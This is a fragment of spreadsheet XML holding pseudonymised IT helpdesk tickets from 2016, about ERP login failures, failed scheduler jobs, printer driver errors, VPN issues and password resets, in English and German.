    <t>vpn doesnt check for antivirus or company domain while connecting from outside network</t>
  </si>
  <si>
    <t>refer screenshot</t>
  </si>
  <si>
    <t>akisjtzm uvbmysgc</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_37hotf failed in job_scheduler at: 09/15/2016 06:14:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_37hotf failed in job_scheduler at: 09/15/2016 06:14:00</t>
  </si>
  <si>
    <t>system disk c: of server HostName_698 is full again</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fbyusmxz.kxvmcbly@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
system disk c: of server HostName_698 is full again â€“ please check._x000D_
we had the same issue 3 weeks ago (ticket inc1543749)_x000D_
it is the virtual center server._x000D_
</t>
  </si>
  <si>
    <t>reporting_tool: issues with daily sales and orders report.</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: plfwoagd.chtpiazu@gmail.com
no reply from panjkytr.
please create a case.
what we need is a possibility to subscribe to a dedicated  daily sales and orders report and to receive the mti data per email instead of the total industrial results (consisting of the combined results of tooling and mti).
mit freundlichen grugermany / best </t>
  </si>
  <si>
    <t>plfwoagd chtpiazu</t>
  </si>
  <si>
    <t>mr tmqfjard qzhgdoua, ordinary no. 100937, requires full access to the following EU_tool- modules:</t>
  </si>
  <si>
    <t xml:space="preserve">fyi
von: axesnghb cyzuomxa 
gesendet: donnerstag, 15. september 2016 10:19
an: ughzilfm cfibdamq
cc: tmqfjard qzhgdoua
betreff: tmqfjard qzhgdoua : berechtigung fÃ¼r EU_tool- module
hallo herr bghakch,
herr tmqfjard qzhgdoua, stamm- nr. 100937,   benÃ¶tigt vollen zugriff auf folgende EU_tool- module :
chargenverwaltung
pulverleitstand
mit freundlichen grÃ¼ÃŸen
 preuÃŸ
supervisor rod production germany
axesnghb.cyzuomxa@gmail.com
geschÃ¤ftsfÃ¼hrer/managing directors: phvkowml azbtkqwx, naruedlk mpvhakdq
sitz/registered office: germany 
persÃ¶nlich haftende gesellschafterin/general partner: company gmbh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t>
  </si>
  <si>
    <t xml:space="preserve">while trying to ship product to usa, i am not getting a put-away ticket. the system is taking an estorage_productly long time to process the transaction, and i am getting an error stating that the update was terminated.
site / location : company usa, ohio
user id (ad) : lilesfhpk
system you are seeing performance problems on (please list all) (e.g., crm, erp, bw, bobj): erp SID_34
transactions that are slow (e.g., va01, create an order): md04
area this belongs to (e.g., sales, finance, markhtyeting etc.): production
how can this issue be replicated by the it support group:
are other users seeing this? not sure
please attach relevant screenshots and exact times when the issue occurred: 
</t>
  </si>
  <si>
    <t>jyrzqhgt xwasiehc</t>
  </si>
  <si>
    <t>request for mobile email access</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: luxdnsvk.qmnyzcfs@gmail.com_x000D_
_x000D_
dear sir,_x000D_
_x000D_
attached is the filled wireless mobility policy sheet with my manager approval._x000D_
kindly enable email access to my mobile._x000D_
kindly contact me for any information required in this regard._x000D_
_x000D_
with best </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2645 failed in job_scheduler at: 09/15/2016 03:30:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2645 failed in job_scheduler at: 09/15/2016 03:30:00</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: eqmuniov.ehxkcbgj@gmail.com_x000D_
_x000D_
good morning,_x000D_
_x000D_
when  trying to log on to erp i get this error below._x000D_
please help  urgently as i can not process customer order._x000D_
_x000D_
[cid:image001.png@01d20f2e.751db880]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>eqmuniov ehxkcbgj</t>
  </si>
  <si>
    <t>computer gets hot</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ucphibmr.dfvkbtsj@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
my computer is hot and the fan runs all the time so you can hear it._x000D_
_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>kabel vga tauschen \jionmpsf wnkpzcmv</t>
  </si>
  <si>
    <t>monitor defekt</t>
  </si>
  <si>
    <t xml:space="preserve">hallo ,_x000D_
_x000D_
der monitor von ahmet gÃ¶k im materiallager macht probleme. _x000D_
kannst du dir das bitte anschauen._x000D_
</t>
  </si>
  <si>
    <t>install pulverleitstand \tmqfjard qzhgdoua</t>
  </si>
  <si>
    <t>falsche formatierung in pdf \bfqnvezs vwkasnxe</t>
  </si>
  <si>
    <t>bfqnvezs vwkasnxe</t>
  </si>
  <si>
    <t>install pulverleitstand \vaigycet jtgmpdcr</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1338 failed in job_scheduler at: 09/15/2016 02:46:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1338 failed in job_scheduler at: 09/15/2016 02:46:00</t>
  </si>
  <si>
    <t>crm complaint no.7611183893 - it ticket required</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: wiypaqtu.lmgqbpvi@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
please raise it ticket on behalf of me for crm complaint no.7611183893 having error and it's not archived to ecc 6_x000D_
_x000D_
_x000D_
with best </t>
  </si>
  <si>
    <t>wiypaqtu lmgqbpvi</t>
  </si>
  <si>
    <t>login failure  -  erp user nieghjyukea</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: bwvrncih.ibuyfrcq@gmail.com_x000D_
_x000D_
good morning team_x000D_
_x000D_
i have a problem login into erp, please can you assist?_x000D_
_x000D_
kind </t>
  </si>
  <si>
    <t>bwvrncih ibuyfrcq</t>
  </si>
  <si>
    <t>erp-engineering tool</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: bqapjkcl.ljeakcqf@gmail.com
please reset my password in erp-engineering tool.
dipl.-ing.(ba) bqapjkcl ljeakcqf
bqapjkcl.ljeakcqf@gmail.com&lt;mailto:bqapjkcl.ljeakcqf@gmail.com&gt;
company shared services gmbh
managing directors/geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx, naruedlk mpvhakdq
</t>
  </si>
  <si>
    <t>bqapjkcl ljeakcqf</t>
  </si>
  <si>
    <t>reenable erp SID_34 account for vvaghjnthl - same as that of henghl</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rxoynvgi.ntgdsehl@gmail.com
hi it team
kindly please assist to reset SID_34 password for user: vvaghjnthl.
hydstheud mddwwyleh
operation supervisor
company distribution services of asia pte ltd
email : rxoynvgi.ntgdsehl@gmail.com&lt;mailto:rxoynvgi.ntgdsehl@gmail.com&gt;</t>
  </si>
  <si>
    <t>logon balancing error</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: wrelsfqa.qfwosjkh@gmail.com_x000D_
_x000D_
good morning_x000D_
_x000D_
please help. a few of us the south africa office in south africa cannot log into erp. we are all getting " log on balancing error 88". it looks like the diginet line is down. it is not effecting everyone._x000D_
_x000D_
kind </t>
  </si>
  <si>
    <t>username: mabelteghj erp logon</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gkerqucv.bqumyrea@gmail.com_x000D_
_x000D_
good morning,_x000D_
_x000D_
i am not able to log in erp, kindly assist._x000D_
_x000D_
kind </t>
  </si>
  <si>
    <t>erp system</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: iksqbuxf.muzxgwvk@gmail.com
morning
please help syghmesa i can not lock in to erp i did do a shutdown on my computer  still not
please please help us at company south africa
</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vtzhelgs.ivewqogm@gmail.com_x000D_
_x000D_
good morning,_x000D_
_x000D_
can you please assist as i cannot log into erp. i receive the following error;_x000D_
_x000D_
[cid:image001.png@01d20f27.6d462360]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>re; erp</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: btyvqhjw.xbyolhsw@gmail.com_x000D_
_x000D_
good day_x000D_
_x000D_
trust you are well_x000D_
please can you help cant lock in to erp give me the 88 code_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>an terminal 12 bei iso-u kÃ¶nnen im EU_tool keine zeichnungen mehr aufgerufen werden!!</t>
  </si>
  <si>
    <t>an terminal 12 bei iso-u kÃ¶nnen im EU_tool keine zeichnungen mehr aufgerufen werden!! diese funktion wird wegen der auftragsbereitstellung benÃ¶tigt!!!!</t>
  </si>
  <si>
    <t>tiefszyh sfujdlgv</t>
  </si>
  <si>
    <t xml:space="preserve"> bobj error </t>
  </si>
  <si>
    <t>issue while refreshing the global spend analytics v2 report in bobj</t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_tax_interface_qa_daily failed in job_scheduler at: 09/15/2016 00:23:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
[critical] from: bma@HostName_1020.company.company.com "lib5_drive2"  time: 9/14/2016 11:49:50 pm_x000D_
[90:1004]  device address not found. _x000D_
_x000D_
_x000D_
backup statistics:_x000D_
          _x000D_
  session queuing time (hours)         0.00        _x000D_
  -------------------------------------------      _x000D_
  completed disk agents ........         11          _x000D_
  failed disk agents ...........          0          _x000D_
  aborted disk agents ..........          0          _x000D_
  -------------------------------------------      _x000D_
  disk agents total  ...........         11          _x000D_
  ===========================================      _x000D_
  completed media agents .......          1          _x000D_
  failed media agents ..........          0          _x000D_
  aborted media agents .........          0          _x000D_
  -------------------------------------------      _x000D_
  media agents total  ..........          1          _x000D_
  ===========================================      _x000D_
  mbytes total .................  148763 mb        _x000D_
  used media total .............          1          _x000D_
  disk agent errors total ......          0    _x000D_
_x000D_
job bkwin_tax_interface_qa_daily failed in job_scheduler at: 09/15/2016 00:23:00</t>
  </si>
  <si>
    <t>delete the charm 8111117934,  since it is no longer required</t>
  </si>
  <si>
    <t>request you to delete the above charm since it is no longer required</t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_ap2 failed in job_scheduler at: 09/14/2016 22:13:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_ap2 failed in job_scheduler at: 09/14/2016 22:13:00</t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_HostName_770_inc failed in job_scheduler at: 09/14/2016 21:57:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
[major] from: bsm@HostName_1020.company.company.com "HostName_770-full-backup"  time: 9/14/2016 9:09:47 pm_x000D_
[61:3003]   lost connection to vbda named "HostName_770.company.company.com [/e]"_x000D_
 on host HostName_770.company.company.com._x000D_
 ipc subsystem reports: "ipc read error_x000D_
 system error: [10054] connection reset by peer_x000D_
_x000D_
job bkwin_HostName_770_inc failed in job_scheduler at: 09/14/2016 21:57:00</t>
  </si>
  <si>
    <t>unable to load engineering_tool on my new 2-1 says that it cannot connect to internet??</t>
  </si>
  <si>
    <t>see above       cell#</t>
  </si>
  <si>
    <t>vpn and vpn will not allow access to erp</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: pfzxecbo.ptygkvzl@gmail.com
this is the second time this week i have had an issue with vpn.  vpn was my workaround monday, but it is not working for me either this evening.
pfzxecbo ptygkvzl
sr analyst, na indirect industrial sales
pfzxecbo.ptygkvzl@gmail.com&lt;mailto:pfzxecbo.ptygkvzl@gmail.com&gt;
</t>
  </si>
  <si>
    <t>engineering_tool phone app</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vjuxfokc.cwhxnoug@gmail.com_x000D_
_x000D_
please see attached screenshot of the engineering_tool app._x000D_
_x000D_
i am no longer able to check availability as the message "unable to connect to availability server "_x000D_
_x000D_
i have tried uninstalling and reinstalling but didn't fix the problem?_x000D_
_x000D_
is there a known issue?_x000D_
_x000D_
it has been like this for a few weeks._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">can you please remove quyhn mcgudftigre from usa campus calendars as requested </t>
  </si>
  <si>
    <t xml:space="preserve">from: cwuospin nbhoxqpe 
sent: wednesday, september 14, 2016 9:42 pm
to: othybin graceuyt; nwfodmhc exurcwkm
cc: -facility
subject: rakthyesh - re: elt update call
hello help
can you please remove quyhn mcgudftigre from usa campus calendars as requested 
sincerely, 
stanfghyley guhtykes, fmp
facilities manager
usa campus 
on sep 14, 2016, at 11:23 am, othybin graceuyt &lt;hkrecpfv.kgwpbexv@gmail.com&gt; wrote:
hello.  please check this and see if quyhn's meetings can be removed from the calendar.
</t>
  </si>
  <si>
    <t>since last security update i have been unable to print anything on the network printers</t>
  </si>
  <si>
    <t>error message asks me if i trust the printer, then tells me i need to download a driver for it. phone number 724-539-4869</t>
  </si>
  <si>
    <t>trkwehzg pqjrhsul</t>
  </si>
  <si>
    <t>please provide details in the template below (if multiple applications are impacted, please use the quick ticket template in the "operations" folder)._x000D_
site / location : usa_x000D_
user id (ad) :steince_x000D_
system you are seeing performance problems on (please list all) (e.g., crm, erp, bw, bobj):erp SID_34_x000D_
transactions that are slow (e.g., va01, create an order):va01_x000D_
area this belongs to (e.g., sales, finance, markhtyeting etc.):order processing_x000D_
how can this issue be replicated by the it support group:_x000D_
are other users seeing this? there are 5 remote users_x000D_
please attach relevant screenshots and exact times when the issue occurred:</t>
  </si>
  <si>
    <t>outlook/crm error</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: qjiutmel.fgvtxeoy@gmail.com
neither crm or outlook will load.  i have restarted the pc 3 times. locked up several times while synchronizing with crm
login:  wghjkftewj
[image1.jpg]
[image2.jpg]
</t>
  </si>
  <si>
    <t>all contacts loaded for imts -existing accounts (214 of them) did not carry all required fields over from erp crm to msd</t>
  </si>
  <si>
    <t xml:space="preserve">prospect account contacts came over ok.  the contacts that came over incorrectly came over through elm </t>
  </si>
  <si>
    <t xml:space="preserve">job SID_37hotf failed in job_scheduler at: 09/14/2016 17:05:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_37hotf failed in job_scheduler at: 09/14/2016 17:05:00</t>
  </si>
  <si>
    <t>office 2013 for qohfjpna exphkims shows activation required</t>
  </si>
  <si>
    <t xml:space="preserve">we needed to reimage the pc of qohfjpna exphkims (palghjmal1) and now the office 2013 (that comes with the company image from deeghyupak raju) is showing that activation is required. also it shows that leslie account is not associated to that office product. she always had ms office. we just needed to reimage the pc. could you please check her account to fix that? </t>
  </si>
  <si>
    <t>remove</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: kaguhxwo.uoyipxqg@gmail.com
hi it,
please help remove rujpckto lhutkpxm on themfg_grp  group. </t>
  </si>
  <si>
    <t>avpeklim eroqjzab</t>
  </si>
  <si>
    <t>need to change password and get it synced on system</t>
  </si>
  <si>
    <t>outlook not allowing to open emails in the inbox.</t>
  </si>
  <si>
    <t>outlook not allowing to open emails in the inbox._x000D_
connected to the user system using teamviewer_x000D_
-sent a uacyltoe hxgaycze mail to the user from the user mailbox._x000D_
-user confirmed he is able to open it._x000D_
-advised the user to close and reopen the outllok and check._x000D_
-caller confirmed that he is now able to see the emails on outlook._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>uvrwikmy yusexirn</t>
  </si>
  <si>
    <t>external monitors not detecting with dell 2in 1 tablet</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</si>
  <si>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 kd05 (hp color laserjet 4600 pcl6)_x000D_
 _x000D_
   â€¢  detailed description of the problem ? when i try to send a document to this printer, it says "driver update needed" next to printer name.  when i click "print," it starts to download drivers, and repeats this several times, before displaying error "windows cannot print due to a problem with the current printer setup."  i have printed on this printer on my machine before._x000D_
_x000D_
   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) _x000D_
      (inwarehouse_tool â€“ delivery note â€“ production orderâ€¦etc) - specifically microsoft word documents, but i have also tried printing emails and excel documents_x000D_
_x000D_
   â€¢  what system or application being used at time of the problem?      (ex windows / erp /kls) - microsoft word, microsoft excel, microsoft outlook_x000D_
_x000D_
   â€¢  if not printing at all, does it respond to a ping command on the network and has a power cycle of the printer been completed? - n/a_x000D_
_x000D_
   â€¢  if erp system, which system?   (ex SID_34 / SID_38 / hrp / plm) - n/a_x000D_
_x000D_
      â€¢  if it's an erp printer problem can the erp output be rerouted to another erp printer temporarily? - n/a_x000D_
         what printer can it be rerouted too? - n/a_x000D_
_x000D_
   â€¢  if document is not printing correctly, please scan copy of the document and attach to the ticketing_tool ticket.</t>
  </si>
  <si>
    <t>kpogxqvn sfzjbhet</t>
  </si>
  <si>
    <t>erp SID_39 password reset</t>
  </si>
  <si>
    <t>printer driver error</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: sdbcpvtx.hzpctsla@gmail.com_x000D_
_x000D_
good afternoon,_x000D_
_x000D_
i know it isn't only happening to me but i get this error when i try to print on my normal default printer.  it says it needs a driver installed then i get this box.  when i try to get a screenshot the 'now printing' box pops up.  if i close snipping tool it goes away but pops back up every time i try to use the snipping tool to show you the error._x000D_
monday bzxljkoy rvoiqthl was getting the same error._x000D_
_x000D_
[cid:image001.png@01d20e90.37f2e370]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">pc set up for new employee -mghlisha.baranwfhrty                                  </t>
  </si>
  <si>
    <t xml:space="preserve">setup laptop for new hire:mghlisha.baranwfhrty                                  </t>
  </si>
  <si>
    <t>wifi issue</t>
  </si>
  <si>
    <t>wifi is not getting connect</t>
  </si>
  <si>
    <t xml:space="preserve">from: vmqcyzda kgvrfwcj 
sent: wednesday, september 14, 2016 8:00 pm
to: ron port; nwfodmhc exurcwkm
cc: tjlizqgc ngvwoukp; ytqhfmwi itnakpmc; billghj dhjuyick; lipfnxsy rvjlnpef
subject: amar - fw: summit meeting
importance: high
help desk,
this email is not legit and it looks like it's for the upcoming business practice summit.
best </t>
  </si>
  <si>
    <t xml:space="preserve"> pc set up for new employee </t>
  </si>
  <si>
    <t>: pc set up for new employee :krisyuhnyrtkurtyar .kghpanhjuwdian</t>
  </si>
  <si>
    <t>pdf printer</t>
  </si>
  <si>
    <t>i want  software to print documents to pdf</t>
  </si>
  <si>
    <t>vwaliogd dviwuzhm</t>
  </si>
  <si>
    <t>change the old pc</t>
  </si>
  <si>
    <t>configure the new laptop and remove the old pc</t>
  </si>
  <si>
    <t xml:space="preserve">my account is getting locked frequently. worked with gso many times on the same and still the same. please check from your end. </t>
  </si>
  <si>
    <t xml:space="preserve">mii uacyltoe hxgaycze from lacw8515941  : duration is high for loading  as 60.69 s and refresh loaded 5.11 s   </t>
  </si>
  <si>
    <t xml:space="preserve">mii uacyltoe hxgaycze from lacw8515941  : duration is high for loading  as 39.69 s and refresh loaded 5.11 s   </t>
  </si>
  <si>
    <t>approved expense report date range error</t>
  </si>
  <si>
    <t>ess portal
expense report 3111110041 approved with wrong date range showing 8/6/16 - 9/16/16 and needs to say 8/6/16-8/12/16
need to change dates in order to enter in an expense report for dates ranging 8/22/16-8/25/16</t>
  </si>
  <si>
    <t>qvtlcbyg lbnjhysc</t>
  </si>
  <si>
    <t>i am locked out of skype</t>
  </si>
  <si>
    <t>viyglzfo ajtfzpkb</t>
  </si>
  <si>
    <t>unable to host a skype meeting from a conference room</t>
  </si>
  <si>
    <t xml:space="preserve">unable to host a skype meeting from a conference room
</t>
  </si>
  <si>
    <t>rcxmghtb ubveickr</t>
  </si>
  <si>
    <t>vip2: printer driver update</t>
  </si>
  <si>
    <t>fabijhsd ocsnugeh</t>
  </si>
  <si>
    <t>erp user blocked, please unlock immediately &amp; extend the account if necessary - tomorrow is our py run</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: lixwgnto.krutnylz@gmail.com
please unlock user ghjvreicj immediately in erp and extend the account to 31 dec 16.
it is immediately needed â€“ tomorrow is our py run!!!!
von: tszvorba wtldpncx [mailto:jreichard@ppstrixner.de]
gesendet: mittwoch, 14. september 2016 16:57
an: nkjtoxwv wqtlzvxu
cc: lixwgnto krutnylz
betreff: in erp gesperrt - bitte dringend wieder frei schalten
wichtigkeit: hoch
hallo herr hohgajnn,
ich wollte mich eben ein weiteres mal anmelden und habe auch sicher die korrekten anmeldedaten eingegeben.
leider bin ich nun gesperrt.
in anbetracht der bevorstehenden abrechnung benÃ¶tige ich dringend eine freischaltung in erp.
vielen dank im voraus und viele grÃ¼ÃŸe
tszvorba wtldpncx
teamleitung
[logo neu final klein]
personal partner strixner gmbh
[cid:image005.jpg@01d20ea9.0c16ac00]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</si>
  <si>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lixwgnto krutnylz</t>
  </si>
  <si>
    <t>hetoyabq rcmliyot</t>
  </si>
  <si>
    <t>problem with printing</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: iqcylpok.ascpqvni@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i am unable to print to the network printers in my area.  i get pop ups to install the drivers but then there is an error.  please help!_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>pricing error on order number 35022202.</t>
  </si>
  <si>
    <t xml:space="preserve">we are unable to change the price on the order number 35022202. can you please help us fix this issue before the inwarehouse_tool is created tonight. _x000D_
</t>
  </si>
  <si>
    <t>ejfgzqyk wpbujczy</t>
  </si>
  <si>
    <t>reset the password for ahydmrbu fjymgtvo on other / telephony_software</t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
could you please reset my password to telephony_software supervisor system?_x000D_
</t>
  </si>
  <si>
    <t>name:afplnyxb eiomnuba
language:
browser:microsoft internet explorer
email:afplnyxb.eiomnuba@gmail.com
customer number:
telephone:
summary:the password for my vpn is blokker again.
can you please reset teh password? username is vanghtydec
do i have to change the password after you have unlocked it?</t>
  </si>
  <si>
    <t>:unable to log on to outlook this morning</t>
  </si>
  <si>
    <t>unable to log on to outlook this morning_x000D_
_x000D_
microsoft crm add-in was corrupted</t>
  </si>
  <si>
    <t>unable to get skype calls</t>
  </si>
  <si>
    <t>name:bixsapwu lcamiopz 
language:
browser:microsoft internet explorer
email:bixsapwu.lcamiopz@gmail.com
customer number:
telephone:
summary:is there a reason that skype will not call me at a conference room in the usa campus</t>
  </si>
  <si>
    <t>bixsapwu lcamiopz</t>
  </si>
  <si>
    <t>power outage: vogelfontein ,sa vpn circuit is down at 9:47 am et on 09/14. site is up on primary.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ______ 9:47 am et on 09/14________________x000D_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_____na______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</si>
  <si>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update user to interaction desktop</t>
  </si>
  <si>
    <t xml:space="preserve">update user to interaction desktop_x000D_
ypdhesrq eotjzyxm_x000D_
rqll8516072 </t>
  </si>
  <si>
    <t>ypdhesrq eotjzyxm</t>
  </si>
  <si>
    <t>infotype 0017 for 2016-09-01 does not exist for personal no 5650555</t>
  </si>
  <si>
    <t>infotype 0017 for 2016-09-01 does not exist for personal no 5650555
phone: +</t>
  </si>
  <si>
    <t>unable to install the gd&amp;t font</t>
  </si>
  <si>
    <t>name: ovxwqybe gevzkrlp
email: ovxwqybe.gevzkrlp@gmail.com
telephone: 
summary: need gd&amp;t font installed</t>
  </si>
  <si>
    <t>ovxwqybe gevzkrlp</t>
  </si>
  <si>
    <t>re: ticket_no1533125 -- comments added</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: pfzxecbo.ptygkvzl@gmail.com
screen prints are attached to highlight the same fields i had listed in the spreadsheet provided.
this is a live SID_1 example that can be reviewed, incase you werent aware.
[cid:image005.jpg@01d20e69.4b484c70]
[cid:image006.jpg@01d20e69.4b484c70]
[cid:image008.jpg@01d20e69.4b484c70]
[cid:image012.jpg@01d20e69.4b484c70]
from: pfzxecbo ptygkvzl
sent: friday, september 09, 2016 3:56 pm
to: company@ticketing_tool.com
cc: raghfhgh gowhjtya &lt;froajhdb.ijetmkuc@gmail.com&gt;
subject: re: ticket_no1533125 -- comments added
example attached.
SID_1- v-11119004
if there are any questions, please let me know.</t>
  </si>
  <si>
    <t>SID_78user locked out</t>
  </si>
  <si>
    <t>vhfucgar kwrstxqu</t>
  </si>
  <si>
    <t>mii update</t>
  </si>
  <si>
    <t>unable to login to vpn</t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to vpn as the page stopped at checking antivirus client </t>
  </si>
  <si>
    <t>error - failed to reset cached password.</t>
  </si>
  <si>
    <t>locked and unlocked the pc with the new password._x000D_
updated password for email access and companysecure on cell phone</t>
  </si>
  <si>
    <t>aylrbosw gaeycbwd</t>
  </si>
  <si>
    <t>vmsliazh ltksxmyv edksm005 please change schedule of job "import complete erp data (nightly)"</t>
  </si>
  <si>
    <t xml:space="preserve">the files at 0:30 h seems to have missing records. later files seems to be complete _x000D_
the nightly update for milano runs at 3:30 too - this simplyfies support_x000D_
_x000D_
please change the values in the field "occurs once at" and starting at in the attached schedule picture from 0:30 to 3:30 h_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">speakers not working, </t>
  </si>
  <si>
    <t>issue: speakers are not working._x000D_
troubleshooting:-_x000D_
-ran hardware troubleshooter got the message that no speaker, hehr_toolhone connected to device._x000D_
-checked in device manager realtek  audio driver was installed tried updating it, but no update available._x000D_
-tried downloading driver from dell.com/support but as speaker is not installed in the system unable to install any driver._x000D_
-checked playing an audio using earphone and it worked fine, confirming its an issue with the hardware._x000D_
_x000D_
conclusion: either speaker is not installed or is not working</t>
  </si>
  <si>
    <t>outlook not responding after crm sync.</t>
  </si>
  <si>
    <t>reset prtgghj4k password</t>
  </si>
  <si>
    <t>please reset my prtgghj4k password.</t>
  </si>
  <si>
    <t>can not print to tc 28 or tc19 on HostName_769</t>
  </si>
  <si>
    <t xml:space="preserve">since the mandatory it reboot on monday trkwehzg pqjrhsul and i have been unable to print to tc28. i tried tc19 this morning and was also unsuccessful. when attempting to print, a dialogue box pops up and copies some dll files to the c:\ drive. then an error message pops up saying "there was an error when printing started. check printer setup in windows control panel." i tried to update the driver from the control panel and the same dll files are downloaded as when i attempt to print. i've tried printing from several applications (outlook, excel, adobe reader) with no success. other users are still able to print to the printer, it just spit out an erp order from one of the engineers._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>qhisflec okxaytiv</t>
  </si>
  <si>
    <t>skype audio functionality is not working as per expected</t>
  </si>
  <si>
    <t>locked out of SID_37. please reset password</t>
  </si>
  <si>
    <t>wxievyng lfecyzik</t>
  </si>
  <si>
    <t>outlook password prompt</t>
  </si>
  <si>
    <t xml:space="preserve">microsoft connectivity analyzer software confirms that the software is too old to support._x000D_
downloading and installing the service pack fails - no supported software found._x000D_
repaired ms office installation, cleared credentials manager, deleted profile, and contents of app data, local, ms, outlook, restarted pc._x000D_
microsoft office 2010 version </t>
  </si>
  <si>
    <t>srzxoiuj yjvabrzl</t>
  </si>
  <si>
    <t>erp issue for invoicing, insufficient stock mm#2247736 even though there is inventory available.</t>
  </si>
  <si>
    <t xml:space="preserve">customer service at usa, issues sales orders for acct #81254672. consignment inventory shows stock but there may be a batch block that prevents them from allocating inventrtgoy for billing purposes. there is something odd with mm2247736, mb58, erp. this is maghyuigie ghjkzalez, ph . </t>
  </si>
  <si>
    <t>houcdelq wnypackq</t>
  </si>
  <si>
    <t>can't open attached inwarehouse_tools with opentext at erp - see attachment</t>
  </si>
  <si>
    <t>transfer tool trial reports from old laptop to new laptop</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: jkpwisnf.lgpdyncm@gmail.com_x000D_
_x000D_
hello_x000D_
could you please help me in subjected case._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>mobile phone</t>
  </si>
  <si>
    <t>no e-mail receipt for user jkuaslxe hrodszpl and gezpktrq opkqwevj
would you please contact above users as they are currently not receiving e-mails on their mobile phone.
jkuaslxe hrodszpl    
gezpktrq opkqwevj 
please note that they are currently travelling outside of germany.</t>
  </si>
  <si>
    <t>mii not working</t>
  </si>
  <si>
    <t>mii is taking more than 5 min to load. when it does load everyone is getting a br error (attached)</t>
  </si>
  <si>
    <t>wl43 scanner not working.</t>
  </si>
  <si>
    <t xml:space="preserve">wl43 scanner not working. printer is working fine. only the scanner is not working.
phone: </t>
  </si>
  <si>
    <t>file server not functioning</t>
  </si>
  <si>
    <t>the lights at the back of one of the file servers on site is not blinking._x000D_
part of the plant does not access to network resources._x000D_
_x000D_
please help check._x000D_
_x000D_
local file servers_x000D_
_x000D_
\\HostName_1259 - _x000D_
\\lrrsm007 - _x000D_
\\HostName_1260_x000D_
_x000D_
contact  # 252 536 5209</t>
  </si>
  <si>
    <t>jrigdbox bgyluoqn</t>
  </si>
  <si>
    <t>shop_floor_app password misplaced.</t>
  </si>
  <si>
    <t>name:deghjick culghjn
language:
browser:microsoft internet explorer
email:cizplrvw.ymxgteir@gmail.com
customer number:
telephone
summary:i have forgotten my password to shop_floor_app</t>
  </si>
  <si>
    <t>ykrteqjw lvxqjydf</t>
  </si>
  <si>
    <t>the erp - mii  HostName_343 :  jstart.exe service is showing as critical.</t>
  </si>
  <si>
    <t>the erp - mii  HostName_343 : jstart.exe service is showing as critical.</t>
  </si>
  <si>
    <t>mii technical error across usa location.</t>
  </si>
  <si>
    <t xml:space="preserve">:in usa we are receiving a technical error on the mii system and i cannot even log off
contact number: </t>
  </si>
  <si>
    <t>bearbeitung der aktuellen situation nicht mÃ¶glich</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: znqlmjvt.uhyokzlt@gmail.com_x000D_
_x000D_
hallo,_x000D_
_x000D_
